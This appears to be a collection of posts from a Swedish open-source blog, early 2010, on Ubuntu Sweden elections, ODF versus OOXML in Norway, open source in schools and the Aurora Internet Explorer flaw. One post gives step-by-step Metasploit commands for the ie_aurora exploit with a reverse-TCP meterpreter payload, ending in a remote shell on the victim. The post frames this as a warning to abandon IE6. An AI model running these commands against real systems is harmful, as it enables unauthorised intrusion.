2010-02-16

Val hos Ubuntu-se.org

Eftersom min tid som Teamledare - och Andreas Olssons tid som Team Contact - för Ubuntu Sverige snart är över, hålls det just i detta nu en nomineringsprocess för att utse våra efterträdare.

Detaljer kring processen kan läsas i den här forumtråden.

Nomineringsprocessen skulle egentligen ha avslutats för några dagar sedan, men har på grund av vissa tveksamheter kring upplysningen kring valet och nomineringstiden och några avhopp förlängts ytterligare en tid för att vaska fram fler kandidater.

Nomineringen pågår från skrivande stund fram till den 23:e februari klockan 24:00.

Omröstningen kommer att äga rum på forumet mellan den 24:e februari klockan 03:00 till och med den 7:e mars klockan 24:00.

Ovanstående länk kommer att innehålla all information som står att finna kring nomineringarna, valet och resultatet.

Välkomna in och påverka!

Läs även andra bloggares åsikter om , , ,

2010-02-09

Norge ger tummen ner för OOXML


En ny utredning beställd av det norska Direktoratet for forvaltning och IKT menar att OOXML är olämpligt för utbytande av redigerbara dokument i offentlig förvaltning.

Norge har sedan årsskiftet standardiserat på OpenDocument-formatet (ODF) inom offentlig sektor och har parallellt med detta undersökt möjligheterna för att också använda Microsofts OOXML som standard. Utredningen, som gjorts av Hypatia AS i samarbete med Standard Norge, menar att OOXML-standarden har för många ändringsförslag (över 100 stycken på tillsammans mer än 1000 sidor) och att den framförallt har för få fungerande implementationer, alltså program som klarar av att läsa och skriva standarden till 100%.

Vidare debatt kommer att följa eftersom ärendet inte är avgjort i och med denna utredning. Jag tolkar den här sidan som att man vill ha in någon typ av remiss-svar på utredningen.

Microsoft hävdar att Hypatia AS är partiska och för en egen agenda då de redan vid standardiseringsförhandlingarna i Norge menade att OOXML var en uselt uppbyggd dokumentstruktur som hade varit alltför påverkade av Microsoft under alla år.

I slutet av januari stod det klart att Danmark väljer ODF framför OOXML på grund av att ODF var det enda formatet som levde upp till de krav man ställde:

  • Formatet måste vara fullständigt dokumenterat och offentligt tillgängligt.
  • Det måste kunna implementeras fritt utan ekonomiska, politiska eller juridiska begränsningar på implementation och användning.
  • Måste vara godkänt av ett internationellt erkänt standardiseringsorgan, till exempel ISO.
  • Det måste kunna visas att standarden kan implementeras i sin helhet på flera plattformar.
  • Formatet måste ha interoperabilitet med funktionerna till andra standarder på listan.

Även om Sverige också har ODF som offentlig standard är det något annat som gäller i den ack så praktiska verkligheten. ODF kan väldigt sällan användas eller ens läsas av kommunala förvaltningar och inte heller av många statliga myndigheter.

Dags att ta ett krafttag för användandet av öppna dokumentstandarder.

Läs även andra bloggares intressanta åsikter om , , , , , ,

2010-01-25

Nyzeeländsk skola kör 100% öppen källkod

Linux.conf.au, en konferens om öppen källkod i Oceanien, hölls ett föredrag om Albany Senior High School i Auckland, Nya Zeeland. Skolan har kört en fullständig öppen källkodsmiljö sedan den startades i mitten på 2009. På klientdatorerna körs Ubuntu och på servrarna använder man Mandriva, på grund av dess katalogtjänst.

Tidningen CIO menar att serverkostnaderna kapats med hur många procent som helst, men deras uträkning ger jag faktiskt inte mycket för. Bara för att racken man köpt in rymmer 48 enheter måste man inte fylla upp dem. Skolan har trots allt bara 230 elever och de fyra servrar man kör borde räcka gott för eleverna oavsett vilket operativsystem man kör.

Man har valt öppen källkodsvägen trots att det finns ett stort och väldigt subventionerat statligt avtal med Microsoft för att köra deras programvaror. Detta i sin tur innebär att man faktiskt betalar för programvara som man inte använder eftersom man väljer att gå sin egen väg. Alla referensplaner är dessutom skrivna med utgångspunkt i en Microsoftmiljö.

Programvaror som används är bland annat OpenOffice.org och Google Docs för kontorsgöromål, Moodle för utbildningsmaterial, den sociala programvaran Mahara för studentmaterial och portfolios och Koha för bibliotekssystemet.

Projektet har enligt upphovsmännen avlöpt bra med god acceptans från eleverna, till skillnad från det i Ekbackeskolan i Osby, där "elevdatorerna inte går att använda". Det verkar dock vara helt annorlunda på det närliggande Naturbruksgymnasiet där datorerna fungerar fint.

Kanske har det att göra med att Ekbackeskolan inte hade något intresse av att utbilda vare sig personal eller elever i det nya systemet utan väntade sig att det skulle fungera på precis samma sätt som i Windows?


Att förvänta sig att man ska kunna förstå ett system bara genom att sätta sig ner och använda det är ett relativt naivt förhållningssätt som inte fungerar för de allra flesta. Det kräver aktivt kunskapssökande vilket inte alla finner speciellt roligt eller ens har kunskapen att göra. Att peka och klicka omkring i ett fönsterhanteringssystem är väl inte så komplicerat, men så fort det ska installeras program, göras inställningar och anpassas till den enskilda elevens behov och förutsättningar, då blir det lite mer komplicerat.

Windows-plattformen har ett klart övertag efter 20 års marknadsdominans. Supportkapitalet bland familj, vänner, grannar och personal på skolan ska inte underskattas. Linux och öppen källkod har inte den basen att stå på och kan därför inte bara hoppas att det löser sig automatiskt. Det måste finnas en supportorganisation och lektionstid som avsätts för att lära sig och förstå det nya systemet.

Detta är något som både IT-organisationen och skolledningen borde trycka lite extra på. Det är knappast något specifikt för Linux, det gäller även det "intuitiva" Mac OS X eller vad det vara månde. Ingen IT-lösning är så enkel att den inte kräver några utbildningsinsatser. Problemet är bara att när det kommer till Windows så är utbildningsinsatsen redan gjord av åratal av användande på andra arenor än i exempelvis skolan, så där kan eleverna redan hantera den i viss mån.

Implementationen på Nya Zeeland genomfördes på ungefär två månader, vilket är ett oerhört kort projekt med bara några veckor var för utvärdering, test och uppstart. Ändå har systemet fungerat bra. Nyckeln här är troligtvis att man inte har något gammalt system att konvertera från, gamla dokument som måste kunna läsas och annat gammalt mök som ligger och drar. Inlåsning i olika system tar tid att ta sig ur, kostar mängder med pengar och kan få ett projekt att helt gå i stöpet. LiMux-projektet i München är ett bra exempel på ett sånt.

Kostnaderna för systemskiftet läggs inte sällan på det nya systemet, vilket gör att totalkostnaden för ett byte till ett system som långsiktigt är billigare blir högre än att köra vidare på samma gamla system som låser in både dokument och användare i licensmodeller som kostar på sikt.

Läs även andra bloggares intressanta åsikter om , , , , , , ,

2010-01-19

Microsoft UK försvarar sig om Aurora-hålet i Internet Explorer


Det är lite blåsigt kring Microsoft för tillfället. Nu har Microsofts brittiske säkerhetschef gått ut i en intervju i Techradar och hävdar att man blir mindre säker på internet om man väljer att gå ifrån Internet Explorer-plattformen till någon konkurrerande webbläsare.

Cliff Evans menar, enligt IDG.ses översättning att

"nettoeffekten av att byta bort IE är att du kommer att få en mindre säker webbläsare."
Han säger också i artikeln i Techradar att
"The reality of the risk is minimal, even if you have IE6; you would have to go to a website running the exploit."
Hur svårt det är att få folk att klicka på länkar och ge bort sina lösenord och dylikt visas dock rätt tydligt i en annan artikel på IDG.se. Säkerhetsmedvetandet är lågt på de allra flesta ställen och det är inte svårt att via social engineering och kedjebrev få folk att klicka på skräp.

Att Google drabbats visar att till och med IT-företag, som borde vara mer säkerhetsmedvetna än genomsnittet, inte går säkra.

PC för Alla meddelar samtidigt att runt 80 procent av företagsanvändarna i en ny undersökning kör Internet Explorer. Detta eftersom bland annat många intranätlösningar kräver den för att fungera. I den artikeln heter det bland annat:
- Att IE skulle försvinna från marknaden är väldigt långsökt. De som säger sådana saker har ingen uppfattning om hur det ser ut på många företag världen över
Cliff Evans kan dock inte säga med säkerhet att det kommer att komma en säkerhetsuppdatering för Internet Explorer innan den vanliga patch-tisdagen, vilket kan innebär att man kan få vänta ända till 9 februari innan den kommer. Till dess är det tre veckor i skrivande stund.

Jag undrar hur många säkerhetschefer på banker, institutioner och företag som vill sitta i ovisshet så länge. Det är som sagt tack vare Metasploit ganska enkelt att använda sig av säkerhetsluckan.

Nu, två dagar efter oss andra, har också IDG.se snappat upp att även Frankrike gått ut och varnat för Internet Explorer, och gjorde så innan Sitic.

Läs mina andra bloggposter på ämnet:

Läs även andra bloggares intressanta åsikter om , , , , , , , , ,

Fosskalendern.se firar ett år (typ..)

För ungefär ett år sedan satt jag och pillade på de sista detaljerna på fosskalendern.se. Efter att ha letat med ljus och lykta efter en kalender-aggregator som kunde presentera flera olika kalendrar som en, börjat bygga på en själv och gett upp halvvägs, hade jag hittat Calagator, en Ruby-on-Rails-kalender som gjorde precis det jag behövde, och det jag tyckte att FOSS-Sverige behövde.

Jag kunde visserligen inte ett dugg om Ruby on Rails, och det verkade inte som att någon annan kunde det heller, eller de ville åtminstone inte skylta med det. Men detta lilla faktum stoppade mig inte, utan jag började glatt översätta de mest kritiska delarna, gjorde temaändringar tills det åtminstone inte såg ut som en rakt-av kopia av original-sajten, och publicerade den.

Nu såhär ett år(ish..) senare måste jag konstatera att fosskalendern.se har varit en stor framgång. Evenemangsräknaren är uppe i 150+, så under det år som gått har vi väldigt lågt räknat haft åtminstone 100 evenemang som stått listade i kalendern. Men vi nöjer oss inte där. Siktet för 2010 är att åtminstone dubbla detta antal.

Dagen till ära har jag lyft fram möjligheterna med kalendern ytterligare. På framsidan har jag lagt till länkarna till RSS Atom-flödet, iCalendar-flödet och lite annat smått och gott. Fosskalendern är ju inte bättre än det antal människor som använder den, så ju fler som vet om den och ju enklare det är att använda den, desto bättre. Jag kommer att posta några howto's för hur man prenumererar och lägger upp evenemang lite senare.

Som lök på laxen har jag lagt till en facebook-sida för Fosskalendern.se, samt en twitter-sida, som kommer att användas för att tweeta evenemang från kalendern.

Om ni har idéer på förbättringar eller ändringar som skulle göra Fosskalendern.se ännu bättre, tveka inte att höra av er!

Läs även andra bloggares åsikter om , , , , ,

2010-01-18

Så här fungerar Aurora-hacket på Internet Explorer 6


Metasploit-projektet är världens största ramverk för IT-penetrationstester. Det är öppen källkod och har den absolut största databasen med kända exploits - säkerhetsluckor - av alla testmiljöer därute på det stora vida internet.

Som jag skrev tidigare så har Metasploit bara några timmar efter tillkännagivandet ordnat ett exploit för det så kallade Aurora-hacket.

Hacket kräver att en webbserver av något slag serverar koden till den sårbara maskinen. Enligt Metasploits blogg, fungerar hacket med en fullt patchad Windows Xp med Service Pack 3.

För att köra igång Metasploit, installera senaste versionen och kör en online-uppdatering.

Starta konsollen med kommandot msfconsole och skriv kommandona i fetstil:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (din IP-adress)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >


Öppna Internet Explorer på en sårbar maskin och skriv in det lokala IP-numret (i det här fallet http://192.168.0.151:8080/) i adressfältet. Om allt fungerat som det ska bör du få ett svar från Metasploit-konsollen, som ser ut såhär:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)


Efter detta kan du inleda en ny session med kommandona i fetstil:

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>
och du är inne i systemets kommandotolk.

En fin video finns från de snälla människorna på Praetorian:

The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.



Den visar hur du gör rent praktiskt för att starta exploiten och döda en process, som ett proof-of-concept.

Denna säkerhetsbrist är alltså just i skrivande stund och sedan tre-fyra dagar tillbaka i allra högsta grad levande. Visserligen krävs det ett spam-epostmeddelande eller kanske någon illasinnad länk skickad via twitter för att få det att fungera, men i dessa url-förkortningstider (Bit.ly för att bara ta ett exempel) är det inget större problem att skicka skräp till varandra.

Varenda statlig institution, varje företag och ideell organisation som fortfarande kör en fullt patchad Windows XP med Service Pack 3, men fortfarande använder Internet Explorer 6 är alltså sårbara för den här typen av intrång!

Så här enkelt är det att ta sig in i ditt nätverk via webbläsaren Internet Explorer 6. Internet Explorer 7 har också denna sårbarhet om än med en variant, likaså en Internet Explorer version 8 om Data Execution Protection (DEP) av någon anledning är avslaget.

Byt ut din Internet Explorer nu!

Läs även andra bloggares intressanta åsikter om , , , , , , , , ,

Sveriges IT-incidentcentrum (Sitic) varnar också för att använda Internet Explorer



Efter att Tyskland (SvD, DN) och även Frankrike (Google-översatt från le Monde) gått ut och varnat för att använda Internet Explorer, gör nu Sveriges IT-incidentcentrum Sitic detsamma, om än inte i samma kraftfulla ordalag.

Detta är knappast förvånande. Så gott som hela Sveriges offentliga IT-infrastruktur är ju byggt på produkten ifråga och Sitics policy är att inte uttala sig om specifika produkter, enligt IDG.se. Tor Johnson, säkerhetsexpert på Sitic citeras med

– En temporär lösning kan vara att använda en annan webbläsare
Sitic menar dock att alla Windows-versioner kan påverkas, liksom Internet Explorer 6, 7 såväl som 8, även om hotet är mindre med version 8, på grund av dess Data Execution Prevention (DEP). Eftersom Sitic har sin policy får den här rekommendationen ses som relativt kraftfull. Föga förvånande är inte Daniel Akenine, teknikchef på Microsoft i Sverige lika skeptisk. Han rekommenderar istället att man uppgraderar till Internet Explorer 8 och väntar på en säkerhetsuppdatering som kommer .. någon gång.

Att hotet är allvarligt visas dock av att Microsoft funderar på att gå utanför sina vanliga rutiner och släppa en uppdatering innan sin sedvanliga patch-tisdag, som brukar vara den andra tisdagen i varje månad.

Att det enligt Akenine inte synts någon större spridning spelar mindre roll när hotet är allvarligt och Metasploit släppt en funktion för att använda sårbarheten på ett enkelt sätt. Även om Microsoft i Tyskland tonat ned hotbilden genom att uttala sig om att attackerna utfördes av
"extremt motiverade människor med en mycket specifik agenda" och att "attacken inte var riktad mot vanliga användare eller konsumenter"
Det är inte samma sak som att den inte kan riktas mot vanliga användare eller konsumenter, märk väl.

Blogge uttrycker sig som vanligt rätt så mustigt kring det hela.

Jag undrar när bankerna vaknar till liv och tar upp plånboken för att uppgradera sina interna system från Internet Explorer 6. Jag vet åtminstone två av våra största banker som sitter med enbart Internet Explorer 6 på de interna nätverken. Jag känner mig inte alls säker att mina pengar förvaltas väl av våra storbanker.

Med den här säkerhetsbristen känns det ännu mer ovisst.

Läs även andra bloggares åsikter om , , , , , , , ,

UK: Arresterad för bombskämt på Twitter


Bild från forth.ie

This just in: Twittraren Paul Chambers, som klokt nog låst sina tweets numera, arresterades under Terrorism Act i Storbritannien efter att ha ventilerat sin frustration då den flygplats som han skulle åka ifrån en vecka senare stängts på grund av massivt snöfall. För att roa sina vänner skrev han:

"Robin Hood airport is closed. You've got a week and a bit to get your shit together, otherwise I'm blowing the airport sky high!!"


Det var menat som ett skämt, men polisen tog det inte riktigt så. En vecka senare arresterades han och förhördes i ungefär sju timmar, enligt The Independent.

Det här visar (återigen!) på att det inte spelar någon roll hur "rent mjöl i påsen" man har, när det handlar om scared-shitless ordningsmakter med våldsmonopol så kan man ändå åka på rätt rejäla obehagligheter. Han har dessutom blivit bannlyst från Doncaster-flygplatsen på livstid. Det känns rimligt.

Till er som tycker att han får skylla sig själv: eat my shorts. Man ska kunna skämta om såna här saker utan att det leder till massarresteringar och utlämnande till någon tortyr-nation. Det här är så löjligt att klockorna stannar.

Läs även andra bloggares åsikter om , , , , , ,

Det öppna Norge


Öppna dokumentformat handlar om sättet att lagra information i exempelvis ett ordbehandlingsdokument. Ett öppet dokumentformat har utarbetats av en oberoende sammanslutning i en öppen process. Öppna dokumentformat har också en referensimplementation som visar hur det ska fungera, och ett publikt dokument som beskriver hur det är uppbyggt. Detta för att man på ett enkelt sätt ska kunna använda dokumentformatet i sin egen produkt och därför få en jämnare konkurrenssituation.

Att Norge i jämförelse med Sverige är väldigt långt framme när det gäller öppna dokumentformat är kanske ingen nyhet för många av mina läsare. Den norska Referenskatalogen för standarder inom offentlig sektor har sedan länge hänvisat till OpenDocument-formatet (ODF) (ISO 26300) och PDF/A (ISO 19005-1) som format för att hantera text-dokument.

Att standardisera myndighetskommunikation på öppna format har flera fördelar. En är att befolkningen kan ta del av informationen utan att tvingas köpa programvara, eller piratkopiera densamma. I Sverige är det mer regel än undantag att skolelever tvingas piratkopiera eller i undantagsfall lägger pengar på att köpa Microsoft Office för att kunna ta del av information från skolan på sina hemdatorer. En annan fördel är att dokumentformatet aldrig kommer att "gå ur tiden" eftersom standarden är öppet tillgänglig och publicerad. Om så dokumenten blir 1000 år gamla så kommer de att kunna läsas i den form de skrevs, eftersom det går att tolka dokumenten så som avses, under förutsättning att lagringsmediat är läsbart förstås.

I en undersökning från 2008 kunde 80 procent (80%) av Sveriges kommuner inte svara på dokument som skrivits i ett öppet eu-standardiserat dokumentformat. De andra hänvisade till exempel till att skicka i Microsofts .doc-format, eller "i ett format som vi kan öppna".

Nu meddelar Norsk Rikskringkastning (NRK) att man inför OpenOffice.org, ett fritt och gratis kontorspaket som kan läsa och skriva det standardiserade formatet ODF. Detta i tillägg till att all media från NRK ska vara tillgänglig i de öppna formaten Ogg/Theora (video), Ogg/Vorbis (ljud) och FLAC (förlustfritt ljud).

Anledningen till bytet uppges bland annat vara att Mac OS X-versionen av Microsoft Office inte hanterar ODF-formatet, vilket gör att de drygt 850 Apple-datorerna som NRK har inte kan använda sig av det standardiserade formatet. Man menar också att licenskostnaderna för Office-paketet är en del i anledningen till att bytet ska göras.

De få problem som tillstött härrör ur de dokument och mallar där VisualBasic-kod använts för att automatisera beställningar och visa scheman. Man kommer att lösa detta genom att lägga scheman (som sig bör i mitt tycke) i en nätverksdatabas istället för i dokument. Andra problem som uppkommit är regelhanteringen mot Microsoft Exchange och varsling om ny epost, då man gått över till att köra Outlook WebAccess via webbläsaren istället för programmet Outlook.

Som statsrådet Heidi Grande Røys uttryckte saken (fritt översatt):

Det är ett demokratiskt problem när inte alla kan följa med [i Stortings-debatter] för att staten och andra använder proprietära lösningar


Man har därför bestämt att alla offentliga institutioner ska följa dessa dokumentstandarder senast 1 januari 2011 och att alla offentliga webbplatser som serverar ljud- och bildinnehåll ska införa Ogg-formaten till 1 januari 2012 och att tidigare inspelat innehåll ska vara konverterat till 1 januari år 2014. Man trycker också hårt på att alla offentliga webbplatser ska använda teckenuppsättningen UTF-8 (ISO 10646).

Till detta kan läggas att Norge har ungefär 300 högstadie- och gymnasieskolor som kör öppen och fri programvara i verksamheten.

Det hade varit intressant att se en parallell-installation av OpenOffice.org på alla svenska statliga datorer någon gång i framtiden, så att man kan öppna dessa dokumentformat överallt. Det kostar som sagt inget i licenskostnader, men är givetvis inte gratis i arbetstid.

Vinsterna för samhället i stort skulle dock kunna bli rejäla på sikt.

Det är dags att ta ett krafttag för att få bukt med de här problemen. Jag kommer att starta upp ett projekt om några månader som syftar till att bygga en öppen infrastruktur för skolor att bygga på. Den som vill vara med i projektet är välkommen att kommentera det här inlägget.

Läs även andra bloggares intressanta åsikter om , , , , , , , ,

2010-01-16

Tysklands IT-säkerhetsmyndighet avråder från att använda Internet Explorer

Ingen har väl missat Googles utspel mot Kina efter att man upptäckt en attack mot företaget som hade sitt ursprung därifrån. Då fick ju Google en chans att slå sig för bröstet och äntligen sätta en liten newton bakom sitt "Don't be evil"-mantra. Nu står det klart att det var en svaghet i Internet Explorer 6,7 och 8 som användes, som gör det möjligt att fjärrköra programkod via webbläsaren. Opassande har gjort en bra länksammanfattning av det inträffade.

Microsoft har utfärdat säkerhetsmeddelandet 979352 som beskriver problemet. Det lovas också att hålet ska tätas till "inom kort".

Problemet är dock att verktyget Metasploit som testar penetration av nätverk hade en funktion klar för att utnyttja sårbarheten inom några få timmar efter tillkännagivandet. Alltså långt innan säkerhetshålet ens börjat täppas till, vilket återigen bevisar att det är omöjligt för enskilda företag att hålla jämna steg med det kollektiva internet.

Tysklands IT-säkerhetsmyndighet (BSI) har därför uppmanat alla tyska medborgare och myndigheter att sluta använda Internet Explorer till förmån för andra webbläsare, åtminstone tills hålet är tätat igen. De meddelar också att köra Internet Explorer i "skyddat läge" stoppar inte möjliga attacker.

Jag hoppas att svenska myndigheter följer efter för att trygga vår statliga information mot intrång utifrån. Här är det ju bara interna myndigheter som får ta del av folkets snaskiga hemligheter.

Detta är ännu en spik i Internet Explorers kista och jag utgår nu ifrån att myndigheter och företag på allvar börjar uppdatera sina nätverksanslutna datorer så att vi slipper höra om eländet något mer. Internet Explorer 6 är för guds skull nio (9!!) år gammal vid det här laget.

Läs även andra bloggares intressanta åsikter om , , , , , , , ,